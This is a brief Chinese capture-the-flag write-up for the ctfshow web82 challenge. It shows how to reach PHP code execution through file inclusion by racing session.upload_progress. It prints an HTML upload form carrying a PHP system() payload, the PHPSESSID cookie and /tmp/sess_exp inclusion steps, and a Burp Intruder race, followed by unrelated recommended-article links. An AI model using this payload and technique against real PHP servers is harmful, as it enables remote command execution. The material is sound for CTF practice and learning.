文件包涵条件竞争(ctfshow82)

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
谈不譚网安3 小时前
Raven2
web安全·网络安全
网安INF8 小时前
网络攻防技术:网络安全攻击概述
安全·web安全·网络安全·网络攻防
emma羊羊13 小时前
【文件读写】18,21关
网络安全·upload
电子科技圈1 天前
芯科科技第三代无线SoC现已全面供货
嵌入式硬件·mcu·物联网·网络安全·智能家居·智能硬件·iot
Bruce_Liuxiaowei2 天前
内网连通性判断:多协议检测方法与应用
运维·安全·网络安全
emma羊羊2 天前
【文件读写】图片木马
linux·运维·服务器·网络安全·靶场
介一安全2 天前
资产信息收集与指纹识别:HTTPX联动工具实战指南
网络安全·安全性测试·httpx·安全工具
unable code3 天前
攻防世界-Web-easyupload
网络安全·web·ctf
Bruce_Liuxiaowei3 天前
MQTT协议在物联网环境中的安全风险与防范指南
运维·网络·物联网·安全·网络安全
witkey_ak98964 天前
网安面试题收集(1)
网络安全